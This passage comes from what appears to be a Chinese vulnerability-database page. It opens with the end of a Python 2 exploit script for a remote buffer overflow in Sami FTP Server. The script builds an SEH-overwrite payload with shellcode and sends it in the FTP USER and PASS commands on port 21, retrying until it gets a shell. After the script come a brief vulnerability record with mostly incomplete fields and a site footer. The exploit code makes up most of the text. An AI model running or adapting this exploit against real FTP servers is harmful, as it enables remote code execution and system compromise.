        "GpRd0T602vaFF6w666rnqFsf2sPV0h2YzleoovYoXUK9kPrnSfPFYo00Ph7xk7wm"
        "sPYoKeMkxplulb2vsXoVmEOMomKO9EgL4FCLFjk0YkM0qec5Mkg7FsD2ROqzGpv3"
        "ioJuAA"
    )
     
    # Final payload, SEH overwrite ocurrs at 600 bytes
    payload = alignment + "."*(600-len(alignment)-len(jmpfront)) + jmpfront + struct.pack("<L", popret) + shellcode
    try:
        s = socket.create_connection((ipaddr, 21))
        s.send("USER "+ payload +"\r\n" )
        print s.recv(4096)
         
        s.send("PASS "+ payload +"\r\n" )
        print s.recv(4096)
        print s.recv(4096)
    except e:
        print str(e)
        exit("[+] Couldn't connect")
             
if __name__ == "__main__":
    ipaddr = raw_input("[+] IP: ")
    doHavoc(ipaddr)
    while raw_input("[?] Got shell?(y/n) ").lower() == "n":
        doHavoc(ipaddr)
    print "[+] Enjoy..."

    

- 漏洞信息

22734
Sami FTP Server USER Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-01-24 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站